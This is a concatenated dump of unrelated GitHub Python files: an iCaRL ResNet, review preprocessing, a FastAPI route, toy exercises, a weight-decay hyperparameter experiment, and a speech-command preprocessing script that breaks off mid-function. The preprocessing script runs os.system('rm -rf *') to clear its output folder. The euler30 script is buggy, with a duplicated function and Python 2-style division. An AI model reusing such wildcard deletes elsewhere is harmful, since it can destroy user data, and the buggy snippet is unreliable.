conv3x3(in_planes: int, out_planes: int, stride: Union[int, Sequence[int]] = 1):\n return Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\n\ndef batch_norm(num_channels: int) -> BatchNorm2d:\n # Default gamma and beta values are 1 and 0 in both lasagne and pytorch\n # Same for epsilon, which is 1e-4 in both frameworks\n # Same for \"alpha\"|\"momentum\" (lasagne|pytorch)\n # Both frameworks update running averages during training\n\n return BatchNorm2d(num_channels)\n\n\nclass ResidualBlock(Module):\n\n def __init__(self, input_num_filters: int, increase_dim: bool = False, projection: bool = False,\n last: bool = False):\n super().__init__()\n self.last: bool = last # 마지막 블록 여부를 저장하는 불리언 변수를 초기화한다.\n\n if increase_dim: #차원이 증가하는 경우, 첫 번째 컨볼루션 레이어의 stride와 출력 필터 수를 서정\n first_stride = (2, 2)\n out_num_filters = input_num_filters * 2\n else:# 차원이 증가하지 않는 경우, stride (1,1)로 설정 후, 출력 필터 수를 입력 필터 수와 동일하게 설정\n first_stride = (1, 1)\n out_num_filters = input_num_filters\n\n self.direct = Sequential(\n conv3x3(input_num_filters, out_num_filters, stride=first_stride),\n batch_norm(out_num_filters),\n ReLU(True),\n conv3x3(out_num_filters, out_num_filters, stride=(1, 1)),\n batch_norm(out_num_filters),\n ) # Resodial block의 직접 경로(direct path)를 정의하는 Sequential 모듈. \n # 이 경우로는 두 개의 컨볼루션 레이어와 BN레이어로 구성되어 있으며,\n # 첫 번째 컨볼루션 레이어는 입력 필터수에서 출력 필터수로 변환하고 ReLU활성화 함수를 적용\n # 두 번째 컨볼루션 레이어는 출력 필터수를 유지하고, 다시 배치 정규화와 ReLU를 적용\n\n self.shortcut: Module\n # shortcut 연결을 담당하는 모듈이다. shortcut은 입력을 직접 전달하는 것으로 identity shortcut 또는 proejction shortcut 두가지 옵션 중 하나를 선택할 수있다.\n\n # add shortcut connections\n if increase_dim: # 차원이 증가하는 경우, projection을 선택\n # 이 경우 1x1 컨볼류션 레이어와 배치 정규화를 사용하여 입력 필터 수에서 출력 필터 수로 변환\n if projection:\n # projection shortcut, as option B in paper\n self.shortcut = Sequential(\n Conv2d(input_num_filters, out_num_filters, kernel_size=(1, 1), stride=(2, 2), bias=False),\n batch_norm(out_num_filters)\n )\n else: # 차원이 증가하지 않는 경우, identity shortcut을 선택\n # identity shortcut, as option A in paper\n self.shortcut = Sequential(\n IdentityShortcut(lambda x: x[:, :, ::2, ::2]),\n ConstantPad3d((0, 0, 0, 0, out_num_filters // 4, out_num_filters // 4), 0.0)\n )\n else:\n self.shortcut = Identity()\n\n def forward(self, x):\n # 입력을 받아, Residual Block을 통과시키고 출력을 반환한다. 마지막 블록인 경우, 직접 경로의 출력과 shortcut의 출력을 더하여 반환한다.\n # 그러지 않은 경우 직접 경로의 출력과 shortcut의 출력을 더한 후 ReLU활성화 함수를 적용하여 반환한다.\n if self.last:\n return self.direct(x) + self.shortcut(x)\n else:\n return torch.relu(self.direct(x) + self.shortcut(x))\n\n\nclass IcarlNet(Module): # iCaRL알고리즘을 위한 네트워크 achitecture을 정의한 클래스이며, Residual Block을 사용하여 feature extractor, classifer을 구성한다.\n def __init__(self, num_classes: int, n=5):\n super().__init__()\n\n input_dims = 3 # 입력 이미지의 채널 수\n output_dims = 16 # 첫 번째 Convolutional Layer의 출력 채널 수를 16으로 설정\n\n first_conv = Sequential(\n conv3x3(input_dims, output_dims, stride=(1, 1)),\n batch_norm(16),\n ReLU(True)\n )\n\n input_dims = output_dims\n output_dims = 16\n\n # first stack of residual blocks, output is 16 x 32 x 32\n layers_list = []\n for _ in range(n):\n layers_list.append(ResidualBlock(input_dims))\n first_block = Sequential(*layers_list)\n\n input_dims = output_dims\n output_dims = 32\n\n # second stack of residual blocks, output is 32 x 16 x 16\n layers_list = [ResidualBlock(input_dims, increase_dim=True)]\n for _ in range(1, n):\n layers_list.append(ResidualBlock(output_dims))\n second_block = Sequential(*layers_list)\n\n input_dims = output_dims\n output_dims = 64\n\n # third stack of residual blocks, output is 64 x 8 x 8\n layers_list = [ResidualBlock(input_dims, increase_dim=True)]\n for _ in range(1, n-1):\n layers_list.append(ResidualBlock(output_dims))\n layers_list.append(ResidualBlock(output_dims, last=True))\n third_block = Sequential(*layers_list)\n final_pool = AdaptiveAvgPool2d(output_size=(1, 1))\n\n self.feature_extractor = Sequential(\n first_conv, first_block, second_block, third_block, final_pool, Flatten())\n # feature extractor\n input_dims = output_dims\n output_dims = num_classes\n\n self.fc = Linear(input_dims, output_dims)\n # 선형 레이어를 정의하여 fc로 설정. 입력 크기는 input_dims, 출력 크기는 output_dims 이다.\n\n def forward(self, x):\n # 모델의 forward 연산을 정의하는 함수이며, 입력 x를 받아 출력을 계산한다.\n x = self.feature_extractor(x) # Already flattened\n # 입력 x를 feature_extractor에 통과시켜 특성을 추출합니다.\n # 이미지 차원이 1x1 이 되기 때문에 Flatten이 적용되어 이미지를 벡터로 변환한다.\n x = self.fc(x)\n # 특성 벡터 x를 fc 레이어에 통과시켜 클래스에 대한 확률을 출력한다. 마지막 layer에는 sigmoid 함수가 적용된다.\n return torch.sigmoid(x)\n\n\ndef make_icarl_net(num_classes: int, n=5) -> IcarlNet:\n return IcarlNet(num_classes, n=n)\n\n\ndef initialize_icarl_net(m: Module):\n if isinstance(m, Conv2d):\n kaiming_normal_(m.weight.data, mode='fan_in', nonlinearity='relu')\n if m.bias is not None:\n zeros_(m.bias.data)\n\n elif isinstance(m, Linear):\n # Note: nonlinearity='sigmoid' -> gain = 1.0 as of PyTorch code. See torch.nn.init.calculate_gain(...)\n kaiming_normal_(m.weight.data, mode='fan_in', nonlinearity='sigmoid')\n if m.bias is not None:\n zeros_(m.bias.data)\n\n\n\n","repo_name":"ahhnchangjun/Continual_Learning","sub_path":"iCaRL_PyTorch/models/icarl_net.py","file_name":"icarl_net.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19830126129","text":"import pandas as pd \nfrom nltk.corpus import stopwords \nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport joblib\nimport xgboost \n\n#Perform text preprocessing on the sentiments of the 20 products recommended by our recommendation system\ndef clean_reviews(df): \n\n df['reviews_text'] = df['reviews_text'].replace(r'','', regex = True)\n df['reviews_text'] = df['reviews_text'].replace(r'\\B|\\B|','', regex = True)\n # convert sentiments to lowercase\n df['reviews_text'] = df['reviews_text'].str.lower() \n #remove user mentions\n df['reviews_text'] = df['reviews_text'].replace(r'^(@\\w+)',\"\", regex=True) \n #remove_symbols\n df['reviews_text'] = df['reviews_text'].replace(r'[^a-zA-Z0-9]', \" \", regex=True)\n #remove punctuations \n df['reviews_text'] = df['reviews_text'].replace(r'[[]!\"#$%\\'()\\*+,-./:;<=>?^_`{|}]+',\"\", regex = True) \n #remove words of length 1 or 2 \n df['reviews_text'] = df['reviews_text'].replace(r'\\b[a-zA-Z]{1,2}\\b','', regex=True)\n #remove extra spaces in the tweet\n df['reviews_text'] = df['reviews_text'].replace(r'^\\s+|\\s+$',\" \", regex=True)\n \n #Removing the stopwords\n stop_words = set(stopwords.words('english'))\n mystopwords = [stop_words] \n df['reviews_text'] = df['reviews_text'].apply(lambda x: ' '.join([word for word in x.split() if word not in mystopwords]))\n\n # change the datatype of sentiments by replacing positive by 1 and negative by 0\n df = df.replace({\"Positive\":1, \"Negative\":0})\n \n #Tokenize and vectorize reviews of the recommended items\n word_vectorizer = TfidfVectorizer(\n sublinear_tf=True,\n strip_accents='unicode',\n analyzer='word',\n token_pattern=r'\\w{1,}',\n stop_words='english',\n ngram_range=(1, 3), \n max_features=50000\n )\n all_text = df['reviews_text']\n word_vectorizer.fit(all_text)\n train_word_features = word_vectorizer.transform(all_text)\n\n #Load the sentiment analysis model and make predictions for these reviews\n model = joblib.load(\"joblib_model_xgb.pkl\")\n preds = model.predict(train_word_features)\n df['preds'] = preds\n \n return df","repo_name":"Prajwal-Langde/capstone_heroku","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41602004282","text":"# Python Program for Program to find area of a circle\nimport math as m\n\ndef area(r):\n a = m.pi * (m.pow(r, 2))\n print(\"area of circle is {:.4f} sq.units\".format(a))\n\n\n\nradius = int(input(\"enter the radius:\"))\n\narea(radius)","repo_name":"Madhu-Kumar-S/Python_Basics","sub_path":"Basic Programs/circle area.py","file_name":"circle area.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26906289494","text":"import config\n\nfrom fastapi import APIRouter, Request, Response\n\nfrom core_common import core_process_request, core_prepare_response, E\n\nrouter = APIRouter(prefix=\"/core\", tags=[\"message\"])\n\n\n@router.post(\"/{gameinfo}/message/get\")\nasync def message_get(request: Request):\n request_info = await core_process_request(request)\n\n response = E.response(\n E.message(\n expire=300,\n *[\n E.item(\n name=s,\n start=0,\n end=604800,\n )\n for s in (\"sys.mainte\", \"sys.eacoin.mainte\")\n if config.maintenance_mode\n ]\n )\n )\n\n response_body, response_headers = await core_prepare_response(request, response)\n return Response(content=response_body, headers=response_headers)\n","repo_name":"drmext/MonkeyBusiness","sub_path":"modules/core/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"18"} +{"seq_id":"42878985018","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : JaeZheng\n# @Time : 2019/9/4 14:10\n# @File : Coordinator.py\n\nimport tensorflow as tf\nimport numpy as np\nimport threading\nimport time\n\n\n# 线程中运行的函数,每隔1秒判断是否需要停止并打印自己的ID\ndef MyLoop(coord, worker_id):\n while not coord.should_stop():\n if np.random.rand() < 0.1: # 随机停止所有线程\n print(\"Stopping from id: {:d}\\n\".format(worker_id))\n # 通知其他线程停止\n coord.request_stop()\n else:\n print(\"Working on id: {:d}\\n\".format(worker_id))\n time.sleep(1)\n\n\n# 声明一个协调器\ncoord = tf.train.Coordinator()\n# 创建5个线程\nthreads = [threading.Thread(target=MyLoop, args=(coord, i)) for i in range(5)]\n# 启动所有线程\nfor t in threads:\n t.start()\n# 等待所有线程退出\ncoord.join()","repo_name":"JaeZheng/learn_tf","sub_path":"chapter7/Coordinator.py","file_name":"Coordinator.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23474449532","text":"from sys import argv\ndef digs(n):\n array = []\n while n > 0:\n d = n / 10\n k = n - d * 10\n n = d\n array.append(k)\n array.reverse()\n return array\n\ndef calc(x, y):\n temp = 0\n total = 0\n for i in range(2, x):\n k = digs(i)\n\ndef calc(x, y):\n temp = 0\n total = 0\n for i in range(2, x):\n k = digs(i)\n temp = i\n sum = 0\n for j in k:\n sum += pow(j, y)\n if sum == temp:\n total += sum\n return total\n\nnumber = int(argv[1])\npowers = int(argv[2])\ncalc(number, powers)\n","repo_name":"Sonni/Who-s-Julia-","sub_path":"Benchmarking/stats/euler30/euler30.py","file_name":"euler30.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7990855089","text":"X = float(input())\n\nN = []\n\nfor index, value in enumerate(range(0, 100)):\n nextNumber = 0\n if index == 0:\n N.append(X)\n else:\n nextNumber = N[-1]/2\n N.append(nextNumber)\n\n print('N[%i] = %.4f'%(index, N[index])) ","repo_name":"gustavonikov/URI_problems","sub_path":"URI 1178 - Array Fill III.py","file_name":"URI 1178 - Array Fill III.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10661462879","text":"#!/usr/bin/env python\n# python 3.7, pytorch 1.2, cuda 10.0\nimport numpy as np\nimport os\nimport argparse\nimport pickle\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom typing import List, Tuple\n\n\ndef main():\n p = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n p.add_argument('--dataset', default='MNIST', choices={\"MNIST\", \"CIFAR-10\"}, help=\"which dataset to fit\")\n p.add_argument('--network', default='linear', choices={\"linear\", \"resnet-18\", \"resnet-34\"}, help=\"which network architecture to use\")\n p.add_argument('--inner_steps', default=1000, type=int)\n p.add_argument('--outer_steps', default=100, type=int)\n p.add_argument('--online', default=False, action='store_true')\n p.add_argument('--zeta_min', default=0, type=float, help=\"minimum value of zeta to test\")\n p.add_argument('--zeta_max', default=5, type=float, help=\"maximum value of zeta to test\")\n p.add_argument('--num_zeta', default=1, type=int, help=\"number of values of zeta to test, linearly spaced between zeta_min and zeta_max\")\n p.add_argument('--replicates', default=1, type=int, help=\"run each experiment this many times\")\n args = p.parse_args()\n results_dict = {}\n for zeta in np.linspace(args.zeta_min, args.zeta_max, args.num_zeta):\n for fit_num in range(args.replicates):\n train_stats, valid_stats, test_stats, regularizers, w_norms = run_fit(\n zeta,\n args.inner_steps,\n args.outer_steps,\n args.online,\n args.network,\n args.dataset,\n fit_num=fit_num)\n result = {\n 'train_stats': train_stats,\n 'valid_stats': valid_stats,\n 'test_stats': test_stats,\n 'regularizers': regularizers,\n 'weight_norms': w_norms\n }\n results_dict[(zeta, fit_num)] = result\n\n with open(f'results.pkl', 'wb') as fp:\n pickle.dump(results_dict, fp)\n\n\nclass LinearNet(nn.Module):\n def __init__(self, input_dim, num_classes):\n super(LinearNet, self).__init__()\n # an affine operation: y = Wx + b\n self.fc1 = nn.Linear(input_dim, num_classes) # 28*28 from image dimension, 10 classes\n\n def forward(self, x):\n x = self.fc1(x)\n return x\n\n\ndef get_accuracy(model, images, labels):\n \"\"\"Compute the classification accuracy\"\"\"\n outputs = model(images)\n _, predicted = torch.max(outputs, 1)\n total = labels.size(0)\n correct = (predicted == labels).sum().item()\n return correct / total\n\n\ndef get_test_stats(model, testloader, network, dataset):\n \"\"\"Compute classification accuracy for the entire test set\n\n Args:\n model (torch.nn) the model\n testloader (iterator) iterator over the test data\n network (str) name of the network, either linear, resnet-18, or resnet-34\n dataset (str) either MNIST or CIFAR-10\n\n Returns:\n test_loss (float) cross-entropy loss\n test_accuracy (float) fraction of test images classified correctly\n \"\"\"\n dataloader = iter(testloader)\n total = 0\n correct = 0\n loss = 0\n criterion = torch.nn.CrossEntropyLoss()\n for test_images, test_labels in dataloader:\n if network == 'linear':\n test_images = reshape_for_linear(test_images).cuda()\n elif dataset == 'MNIST':\n test_images = test_images.view(-1, 1, 28, 28).cuda()\n else:\n test_images = test_images.cuda()\n\n test_labels = test_labels.cuda()\n outputs = model(test_images)\n _, predicted = torch.max(outputs, 1)\n loss += criterion(outputs, test_labels)\n total += test_labels.size(0)\n correct += (predicted == test_labels).sum().item()\n return loss, correct / total\n\n\ndef reshape_for_linear(images):\n \"\"\"Reshape the images for the linear model\n Our linear model requires that the images be reshaped as a 1D tensor\n \"\"\"\n n_images, n_rgb, img_height, img_width = images.shape\n return images.reshape(n_images, n_rgb * img_height * img_width)\n\n\ndef fetch_CIFAR_data(network='linear'):\n import torchvision\n import torchvision.transforms as transforms\n\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n trainset = torchvision.datasets.CIFAR10(\n root='./data', train=True, download=True, transform=transform)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=50, shuffle=True, num_workers=2)\n\n testset = torchvision.datasets.CIFAR10(\n root='./data', train=False, download=True, transform=transform)\n testloader = torch.utils.data.DataLoader(testset, batch_size=4, shuffle=False, num_workers=2)\n\n dataiter = iter(trainloader)\n train_images, train_labels = dataiter.next()\n valid_images, valid_labels = dataiter.next()\n\n if network == 'linear':\n train_images = reshape_for_linear(train_images)\n valid_images = reshape_for_linear(valid_images)\n\n train_images = train_images.cuda()\n valid_images = valid_images.cuda()\n train_labels = train_labels.cuda()\n valid_labels = valid_labels.cuda()\n return (train_images, train_labels), (valid_images, valid_labels), testloader\n\n\ndef fetch_MNIST_data(network='linear'):\n import torchvision\n import torchvision.transforms as transforms\n\n transform = transforms.Compose([transforms.ToTensor()])\n\n trainset = torchvision.datasets.MNIST(\n root='./data', train=True, download=True, transform=transform)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=50, shuffle=True, num_workers=2)\n\n testset = torchvision.datasets.MNIST(\n root='./data', train=False, download=True, transform=transform)\n testloader = torch.utils.data.DataLoader(testset, batch_size=50, shuffle=False, num_workers=2)\n dataiter = iter(trainloader)\n train_images, train_labels = dataiter.next()\n valid_images, valid_labels = dataiter.next()\n\n if network == 'linear':\n train_images = reshape_for_linear(train_images).cuda()\n valid_images = reshape_for_linear(valid_images).cuda()\n else:\n train_images = train_images.view(-1, 1, 28, 28).cuda()\n valid_images = valid_images.view(-1, 1, 28, 28).cuda()\n\n train_labels = train_labels.cuda()\n valid_labels = valid_labels.cuda()\n return (train_images, train_labels), (valid_images, valid_labels), testloader\n\n\ndef compute_auxiliary(model, criterion: torch.nn.modules.loss.CrossEntropyLoss,\n train_data: Tuple[torch.Tensor, torch.Tensor],\n valid_data: Tuple[torch.Tensor, torch.Tensor],\n weight_decays: List[torch.Tensor], zeta: float,\n lr: float) -> torch.Tensor:\n \"\"\"Compute the auxiliary variables described in Algorithm 3.1 in the main paper\n\n Note: this increments the gradient of each of the weight_decays tensors corresponding\n to the variable denoted as X in Algorithm 3.1\n\n Returns:\n norm (scalar-valued torch.tensor) this is the squared 2-norm of the difference\n between the training and validation gradients (Y in Algorithm 3.1).\n \"\"\"\n train_images, train_labels = train_data\n valid_images, valid_labels = valid_data\n\n # compute training gradient\n model.zero_grad()\n outputs = model(train_images)\n loss = criterion(outputs, train_labels)\n loss.backward()\n\n train_grads = [p.grad.detach().clone() for p in model.parameters()]\n\n # compute validation gradient\n model.zero_grad()\n outputs = model(valid_images)\n loss = criterion(outputs, valid_labels)\n loss.backward()\n valid_grads = [p.grad for p in model.parameters()]\n \"\"\"\n This code computes auxiliary variables for an update to the hyperparameter gradient.\n Tried to write the update rule here but it doesn't really work well in non-LaTeX.\n \"\"\"\n align = []\n norm = 0\n for p, wd, t_grad, v_grad in zip(model.parameters(), weight_decays, train_grads, valid_grads):\n a = t_grad + wd * p.data - v_grad\n norm += (a**2).sum()\n align.append(a)\n\n for a, p, wd in zip(align, model.parameters(), weight_decays):\n if wd.grad is None:\n wd.grad = torch.zeros_like(wd)\n if norm == 0:\n wd.grad += 0\n else:\n wd.grad += zeta * p * a\n return norm\n\n\ndef optimizer_step(optimizer: torch.optim.Optimizer, model,\n criterion: torch.nn.modules.loss.CrossEntropyLoss,\n data: Tuple[torch.Tensor, torch.Tensor]):\n \"\"\"Helper function to run a single step of the inner optimization\"\"\"\n images, labels = data\n optimizer.zero_grad()\n outputs = model(images)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n return loss\n\n\ndef compute_and_log_statistics(model, train_data: Tuple[torch.Tensor, torch.Tensor],\n valid_data: Tuple[torch.Tensor, torch.Tensor], testloader,\n hyper_step: int, network: str, dataset: str):\n train_images, train_labels = train_data\n valid_images, valid_labels = valid_data\n with torch.no_grad():\n train_acc = get_accuracy(model, train_images, train_labels)\n valid_acc = get_accuracy(model, valid_images, valid_labels)\n\n test_loss, test_acc = get_test_stats(model, testloader, network, dataset)\n test_loss = test_loss.detach().cpu().numpy()\n return train_acc, valid_acc, test_loss, test_acc\n\n\ndef load_model(network, dataset):\n from torchvision import models\n if network == 'linear':\n if dataset == 'MNIST':\n model = LinearNet(28 * 28, 10)\n elif dataset == 'CIFAR-10':\n model = LinearNet(3 * 32 * 32, 10)\n\n elif network == 'resnet-18':\n model = models.resnet18()\n if dataset == 'MNIST':\n model.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)\n elif network == 'resnet-34':\n model = models.resnet34()\n if dataset == 'MNIST':\n model.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)\n else:\n raise ValueError(\"Invalid choice of network\")\n return model\n\n\ndef seed_everything(seed=0):\n random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n\n\ndef run_fit(zeta: float,\n inner_steps: int,\n outer_steps: int,\n online: bool = False,\n network: str = 'linear',\n dataset: str = 'MNIST',\n fit_num: int = 0) -> Tuple[List, List, List, List]:\n \"\"\"Run a single weight-decay experiment with a specific choice of the regularizer\n using Algorithm C.3 (online optimization of Eq. 7)\n\n Args:\n zeta (float) the scale-factor that determines the strength of the regularization penalty\n inner_steps (int) number of steps of inner parameter optimization\n outer_steps (int) number of steps of the outer hyperparameter optimization to ru n\n network (str) either \"linear\" or \"resnet-18\" or \"resnet-34\"\n dataset (str) either \"MNIST\" or \"CIFAR-10\"\n fit_num (int) a random seed for parameter initialization.\n\n Returns:\n train_stats, valid_stats, test_stats (Tuple[List, List]) each of these is a tuple\n containing the cross-entropy losses and classication accuracies over the inner\n optimization on the training, validation and test sets respectively.\n regularizers (List) value of the regularizer over the inner optimization\n \"\"\"\n # make sure we get a fixed random seed when loading the data, so that each fit gets the same\n # 50 image subset of MNIST or CIFAR10\n seed_everything(0)\n if dataset == 'MNIST':\n train_data, valid_data, testloader = fetch_MNIST_data(network)\n elif dataset == 'CIFAR-10':\n train_data, valid_data, testloader = fetch_CIFAR_data(network)\n\n valid_images, valid_labels = valid_data\n\n # Now set the random seed to something different so that each experiment\n # is independent for computing error bars over multiple parameter initializations\n seed_everything(fit_num)\n\n model = load_model(network, dataset)\n model = model.cuda()\n\n criterion = torch.nn.CrossEntropyLoss()\n lr = 1e-4\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\n weight_decays = []\n for parameter in model.parameters():\n weight_decays.append(torch.zeros_like(parameter, requires_grad=True))\n\n ho_optimizer = torch.optim.RMSprop(weight_decays, lr=1e-2)\n\n ## penalty size\n zeta = zeta * lr**2\n\n train_losses = []\n train_accs = []\n valid_losses = []\n valid_accs = []\n test_losses = []\n test_accs = []\n regularizers = []\n weight_norms = []\n\n for hyper_step in range(outer_steps):\n ho_optimizer.zero_grad()\n total_norm = 0\n for _ in range(inner_steps):\n\n sq_norm = compute_auxiliary(model, criterion, train_data, valid_data, weight_decays,\n zeta, lr)\n sq_norm = sq_norm.detach()\n if zeta > 0 and online:\n for wd in weight_decays:\n wd.grad /= torch.sqrt(sq_norm)\n ho_optimizer.step()\n ho_optimizer.zero_grad()\n total_norm += sq_norm # Y update in Algorithm 3.1\n\n # take training step with training gradient\n train_loss = optimizer_step(optimizer, model, criterion, train_data)\n\n # add separable weight decay to optimizer step\n for p, wd in zip(model.parameters(), weight_decays):\n p.data -= lr * wd * p.data\n\n # take hyperparameter step\n optimizer.zero_grad()\n outputs = model(valid_images)\n valid_loss = criterion(outputs, valid_labels)\n valid_loss.backward()\n\n for wd in weight_decays:\n if zeta > 0 and not online:\n wd.grad /= 2 * torch.sqrt(total_norm)\n\n # validation risk hyperparameter gradient using identity approximation to the Hessian\n # gradient estimator proposed by Lorraine et al. 2019\n weight_norm = 0.0\n for wd, p in zip(weight_decays, model.parameters()):\n wd.grad += -lr * p * p.grad\n weight_norm += torch.norm(p)**2\n ho_optimizer.step()\n\n # prep for data dump\n train_loss = train_loss.detach().cpu().numpy()\n valid_loss = valid_loss.detach().cpu().numpy()\n regularizer = torch.sqrt(total_norm).detach().cpu().numpy()\n weight_norm = torch.sqrt(weight_norm).detach().cpu().numpy()\n\n train_acc, valid_acc, test_loss, test_acc = compute_and_log_statistics(\n model, train_data, valid_data, testloader, hyper_step, network, dataset)\n print(f'Hyper step: {hyper_step}')\n print(f'Valid Loss: {valid_loss}')\n print(f'Valid Accuracy: {valid_acc}')\n print(f'Train Accuracy: {train_acc}')\n print(f'Test Accuracy: {test_acc}')\n print(f'Regularizer: {torch.sqrt(total_norm)}')\n print('-------------------------------')\n train_losses.append(train_loss)\n train_accs.append(train_acc)\n valid_losses.append(valid_loss)\n valid_accs.append(valid_acc)\n test_losses.append(test_loss)\n test_accs.append(test_acc)\n regularizers.append(regularizer)\n weight_norms.append(weight_norm)\n\n train_stats = (train_losses, train_accs)\n valid_stats = (valid_losses, valid_accs)\n test_stats = (test_losses, test_accs)\n\n return train_stats, valid_stats, test_stats, regularizers, weight_norms\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DEShawResearch/PACBayesHyperOpt","sub_path":"weight_decay/weight_decay.py","file_name":"weight_decay.py","file_ext":"py","file_size_in_byte":15828,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"29180633460","text":"import string\nimport random\n\ninput_text = 'ABCD'\ntext_array = []\n\na = 3\nm = 13\nuppercase_letters = string.ascii_uppercase\nhash_dict = {}\nhash_text_dict = {}\ncounter = 1\npowered = 0\nhash_result = 0\ncontinued = True\n\nfor letter in uppercase_letters:\n hash_dict[letter] = counter\n counter += 1\n\nwhile continued:\n\n text = ''.join(random.sample(input_text, len(input_text)))\n\n for letter in text:\n hash_result += hash_dict[letter] * pow(a, powered)\n powered += 1\n\n hash_result = hash_result % m\n\n for key, value in hash_text_dict.items():\n if value == hash_result:\n print(text, key)\n continued = False\n break\n\n hash_text_dict[text] = hash_result\n\n powered = 0\n hash_result = 0\n","repo_name":"zolcsika71/JBA_Python","sub_path":"Duplicate File Handler/temp/polynomial_hash.py","file_name":"polynomial_hash.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"24449122514","text":"from django.urls import path\n\nfrom api.user.views import GetCurrentUser\n\napp_name = 'user'\n\nurlpatterns = [\n # path(\n # route='/',\n # view=UserProfileGetUpdateDeleteView.as_view(),\n # name='get_user_profile',\n # ),\n path(\n route='',\n view=GetCurrentUser.as_view(),\n name='get_request_user',\n )\n]\n","repo_name":"Dar0n/trackapps","sub_path":"backend/project/api/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16037705024","text":"\"\"\"\n Pre-process speech-to-command dataset\n\n Preprocessed data are saved to FedTuning/Download/speech_command/_FedTuning/\n\"\"\"\n\nimport os\nimport pathlib\nimport glob\nimport re\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport skimage.io\nimport librosa\n\n\n# dataset name\ndataset_name = 'speech_command'\n\n# absolute path to FedTuning/Download/\ndownload_dir = os.path.join(pathlib.Path(__file__).resolve().parents[2], 'Download')\n\n# absolute path to FedTuning/Download/speech_command\ndataset_dir = os.path.join(download_dir, dataset_name)\nif not os.path.isdir(dataset_dir):\n print(f'Error: dataset directory {dataset_dir} does not exist')\n exit(-1)\n\n# absolute path to store pre-processed data. FedTuning/Download/speech_command/_FedTuning\ndataset_fedtuning_dir = os.path.join(dataset_dir, '_FedTuning')\n\n# users for validation and testing, the remains are for training\nvalidation_list_file = 'validation_list.txt'\ntesting_list_file = 'testing_list.txt'\n\n# user ids for train, valid, and test\n# set() is better than dict{} in this case, but anyway, it works...\nuser_train_dict = {}\nuser_valid_dict = {}\nuser_test_dict = {}\n\n# Users for validation\nwith open(os.path.join(dataset_dir, validation_list_file), 'r') as f_in:\n lines = f_in.readlines()\n for line in lines:\n user_id = re.split('[/_]', line)[-3]\n user_valid_dict[user_id] = user_valid_dict.get(user_id, 0) + 1\n\n# Users for testing\nwith open(os.path.join(dataset_dir, testing_list_file), 'r') as f_in:\n lines = f_in.readlines()\n for line in lines:\n user_id = re.split('[/_]', line)[-3]\n user_test_dict[user_id] = user_valid_dict.get(user_id, 0) + 1\n\n# Users for training\nroot_dir, data_dirs = next(os.walk(dataset_dir))[:2]\nfor data_dir in data_dirs:\n\n # ignore _background_noise_ folder, and _FedTuning folder\n if data_dir.startswith(\"_\"):\n continue\n\n data_dir_path = os.path.join(root_dir, data_dir)\n wav_files = glob.glob(os.path.join(data_dir_path, '*.wav'))\n\n for wav_file in wav_files:\n user_id = re.split('[/_]', wav_file)[-3]\n if user_id in user_valid_dict or user_id in user_test_dict:\n continue\n else:\n user_train_dict[user_id] = user_train_dict.get(user_id, 0) + 1\n\n# change working directory to {dataset_dir}\nos.chdir(dataset_dir)\nif not os.path.isdir(os.path.join(dataset_dir, '_FedTuning')):\n os.system('mkdir _FedTuning')\n\n# change working directory to {dataset_fedtuning_dir}, i.e., {dataset_dir}/_FedTuning/\nos.chdir(dataset_fedtuning_dir)\n# delete all files in directory\nos.system('rm -rf *')\n# create folders for train, valid, and test\nos.system('mkdir train test valid')\n\n# Pre-processing happens here: convert wav to spectrogram and then image, save to corresponding train, valid, and test\nroot_dir, data_dirs = next(os.walk(dataset_dir))[:2]\nfor data_dir in data_dirs:\n\n # save spectrogram to image\n def spectrogram_image(y, sr, out, hop_length, n_mels):\n def scale_minmax(X, min=0.0, max=1.0):\n X_std = (X - X.min()) / (X.max() - X.min())\n X_scaled = X_std * (max - min) + min\n return X_scaled\n\n # use log-melspectrogram\n mels = librosa.feature.melspectrogram(y=y, sr=sr, n_mels=n_mels,\n n_fft=hop_length * 2, hop_length=hop_length)\n mels = np.log(mels + 1e-9) # add small number to avoid log(0)\n\n # min-max scale to fit inside 8-bit range\n img = scale_minmax(mels, 0, 255).astype(np.uint8)\n img = np.flip(img, axis=0) # put low frequencies at 